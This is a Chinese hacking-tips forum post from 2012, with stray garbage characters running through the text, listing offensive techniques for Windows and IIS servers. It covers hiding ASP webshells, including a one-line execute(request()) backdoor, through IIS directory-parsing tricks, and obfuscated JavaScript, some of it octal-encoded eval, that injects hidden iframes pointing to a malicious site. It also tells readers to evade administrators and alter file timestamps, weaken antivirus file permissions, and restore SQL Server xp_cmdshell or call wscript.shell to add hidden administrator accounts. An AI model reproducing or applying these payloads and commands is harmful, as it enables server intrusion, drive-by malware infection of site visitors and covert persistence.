用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
, Y0 Z% U8 B* T! ~& ]
" v- v9 e" a7 f" q7 B1 d53、隐藏ASP后门的两种方法
) @# { F6 o: d. i/ W1、建立非标准目录:mkdir images..\ {+ Q* {! C' U9 D! K( g( m6 |" l
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* J/ W9 j) q% d. a; ^7 c
通过web访问ASP木马:http://ip/images../news.asp?action=login
: o5 H, m. i4 Z7 ]3 h4 j- @0 o如何删除非标准目录:rmdir images..\ /s
4 o1 R6 u l l5 ^/ @2 ]# y/ T7 s2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
# X0 h) k, q, T. X% L. g. ymkdir programme.asp
/ ~% _+ m' {) F3 G2 h新建1.txt文件内容:<!--#include file=”12.jpg”-->8 u5 w! h' {' `0 v' |9 {
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
7 B; e! p, Z* Y# zattrib +H +S programme.asp
n3 T$ s' q0 v0 U. ^5 s通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt4 O/ R+ ~- j' c6 c7 N1 T
+ r5 M" X# E g, B7 X1 ~0 }& w
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
- P6 @3 Q" a" B6 G: B( n4 r# T然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
( O4 F, R0 a) v3 f/ L2 x
3 `" O2 h4 I" V2 F0 q55、JS隐蔽挂马
5 U* _8 b8 [, a6 m- X$ `+ E# P1.& L# g4 Y% \" J* f6 p
var tr4c3="<iframe src=ht";. w5 ^7 V7 a- W2 O+ b# j4 s( ^
tr4c3 = tr4c3+"tp:/";5 C& {7 t: Z2 s$ a4 X
tr4c3 = tr4c3+"/ww";
3 @3 p9 _+ _& K& i! R5 r, \" Otr4c3 = tr4c3+"w.tr4";
+ i+ [: A2 T3 X* Q& P Ptr4c3 = tr4c3+"c3.com/inc/m";1 N; e" k9 u5 ~' V( [$ C
tr4c3 = tr4c3+"m.htm style="display:none"></i";
1 n# L/ X, {( N/ t/ Etr4c3 =tr4c3+"frame>'";
. {3 d1 t' j9 Z* Z/ zdocument.write(tr4c3);
, e' r- }- \7 S9 R6 E% ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
5 t1 ?: i# Q; ]3 Q8 ^1 `+ k! W
/ s: B4 `( {; O2.& h( f( G" _; J" v6 Z$ R' }; C
转换进制,然后用EVAL执行。如4 s6 \! m8 N4 W. I% v: ?
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");4 I; S+ C# _/ v9 J( Z3 e- a4 x
不过这个有点显眼。
" ]9 t( v' \$ e/ t3.
4 ^) V2 U! V# z8 Pdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');# `7 l3 u& ?5 R/ k& ]% i8 F
最后一点,别忘了把文件的时间也修改下。
/ w* _6 C( A6 G) g0 c5 X' D
! h& N4 c( d" Y: \( F- r56.3389终端入侵常用DOS命令6 Y _) [" c3 i+ @9 y0 v
taskkill taskkill /PID 1248 /t
8 u' ~6 ?9 O8 r9 ~) Y R' Z& O3 i/ b0 ] p% b5 \
tasklist 查进程# }( L$ _" p. ~( s" t
3 D1 u; @6 \9 x( L7 I8 x
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; f# ?% C: m* \# [$ Fiisreset /reboot, P& G/ K s! |' |* `6 F( G2 T
tsshutdn /reboot /delay:1 重起服务器
5 O9 _# u( F. a: R& j; z
; V y" v9 _" }4 }) y7 tlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,% v4 e5 {8 C. q U$ b1 k* T9 r% S$ o0 Q
, k, w* A7 K$ A, f7 k! I- i: n) q0 o" k
query user 查看当前终端用户在线情况' ]/ `4 z2 e' c2 @. c% n
# m4 o" H0 d c/ P/ l4 g& E& g4 \ Z
要显示有关所有会话使用的进程的信息,请键入:query process *( w. x0 t, C; ^; _
% N) B5 J% K$ u要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:22 C. Q; p0 n$ _6 U8 u0 u( D& \2 D
; T5 }& _; x8 j8 @
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2+ J6 f; Y- Z/ _
- U8 Z: s# z' \- g+ r
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02. B1 I+ A' `, [
. R/ f. @8 s* V0 }0 j9 Q1 e命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启& P1 W# v& o3 z' z- \
! L w6 U1 R$ M. I' O
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
) A$ @# G6 [* v/ w( s. D
0 ], T" }3 s# z命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。; P$ m" _. v9 ^* V* I" {
) ]# r* B1 G( |0 I命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机6 ^, ]+ T Z' {; o4 F% X. e. H
9 U- ^- x# a- |* y56、在地址栏或按Ctrl+O,输入:
( y. \ i/ ~8 G f% P! X( Wjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;/ `* D! |. M% H
3 f/ _- T9 }- W2 B
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。3 Q; k$ C- h$ q7 i
8 q3 w7 E, a4 \, x
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
0 T, b3 x: t$ T/ |7 n: n H用net localgroup administrators是可以看到管理组下,加了$的用户的。
3 y; K9 D7 g! D& ?3 O' C6 Y J( i( H1 n4 n
58、 sa弱口令相关命令
& K0 O/ ?# e9 G' O% ~9 k# q a1 b. k+ T9 F4 O5 z' t
一.更改sa口令方法:
6 n& h" m: H7 T9 }$ ~, |; I/ f用sql综合利用工具连接后,执行命令:
& {# ?* k3 r* t7 O* x) f# ^) Zexec sp_password NULL,'20001001','sa'
1 J9 b2 Y& m9 `$ {1 P5 e' D(提示:慎用!)
3 g: `) _6 h5 o# h) f& o
0 b" D; a! x: ~ [5 Y X二.简单修补sa弱口令.
, A/ l. B9 ~' U% F5 I1 n) o4 |/ @6 \: r4 m
方法1:查询分离器连接后执行:* M2 b7 h" |5 n1 P0 f; y4 Q/ G! `
if exists (select * from- c [7 I1 ]# u. c% O+ x: s
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and2 U5 t j' ]: ~& v
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 Q% R5 A+ B3 @9 e' g
3 f0 j# i) R" K) s: w
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'8 t4 B) y' ~8 `+ V2 s2 P
+ w7 G5 Q; h/ XGO
, w) O$ R. w8 N" b& }
& O. E6 u( \; \: n! D4 U然后按F5键命令执行完毕3 Z! U* H8 E* V& S+ J
( Z) j8 ^, ~& v
方法2:查询分离器连接后8 Y: I5 j% Y) |$ I3 ^* ]; U
第一步执行:use master3 M! r4 {7 Q2 b: U& U- J! f: [% H. E
第二步执行:sp_dropextendedproc 'xp_cmdshell'2 X- {% C7 u; [9 d" V% @
然后按F5键命令执行完毕! u" p# _9 d1 p. w9 ?
# q5 ?' t! f8 Z/ _5 F
$ M5 r" x: s4 g# W三.常见情况恢复执行xp_cmdshell., e" K8 R2 D7 d
5 g. e" U8 L* O. e+ ^4 G" O. ~. O6 {9 {- P
1 未能找到存储过程'master..xpcmdshell'.
9 T& j# Z Z6 ~5 Z# C( a 恢复方法:查询分离器连接后,; Y9 C- o2 c1 o9 x+ ~
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
1 u+ f4 T8 _' e n2 N第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' \8 E& o( t! S; @, w0 v$ m
然后按F5键命令执行完毕- {/ K2 E# s5 E# L# j
: B2 R s- c6 {+ {. O2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。). P5 \ p# j3 x: ^. n
恢复方法:查询分离器连接后,5 b1 U3 b% h+ Q% z o" w
第一步执行:sp_dropextendedproc "xp_cmdshell"
2 a4 Q7 p. ?: x* P7 M' H. t第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'- C2 ~5 M o" Q5 s6 V3 ^2 I
然后按F5键命令执行完毕# j% C3 t* F9 w8 n V& j, j) ?
( l& w" q4 F6 R% b3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)+ m7 v) @: Y- S9 |- U$ s
恢复方法:查询分离器连接后,
- }# @) E' N6 k7 V& {第一步执行:exec sp_dropextendedproc 'xp_cmdshell', P8 g6 X h; n/ S
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
. I* ?# P6 D6 n" ^3 D然后按F5键命令执行完毕
/ _. ~ T8 v6 I" V; \9 v# m5 ]+ d* M4 ~
四.终极方法." G3 ]9 ?5 J% x4 @) L
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:* v9 p$ T/ X, }( p8 W4 v4 W1 O
查询分离器连接后,
2 F5 G7 L4 q, x9 X! U; {2000servser系统:) w6 Q/ o }9 d" z+ o7 L9 k5 g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
8 T3 s" N' h3 D) @" v7 H+ }6 \
( M, b, X0 y4 _: ?. ~5 k7 U6 `: }7 Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', l- l2 ?9 O5 J$ C7 P
0 x/ u$ M& g2 A, f( U" D0 Uxp或2003server系统:6 k0 K2 W6 D& A
$ B! |. m0 T2 t5 D8 V G& Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
( b `! X5 M l3 y+ |) W; R. ^; v' c5 k. a9 k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" |: s( {, Q; w' Z" N$ x& H |
发表于 2012-9-15 14:13:15
收藏
支持
反对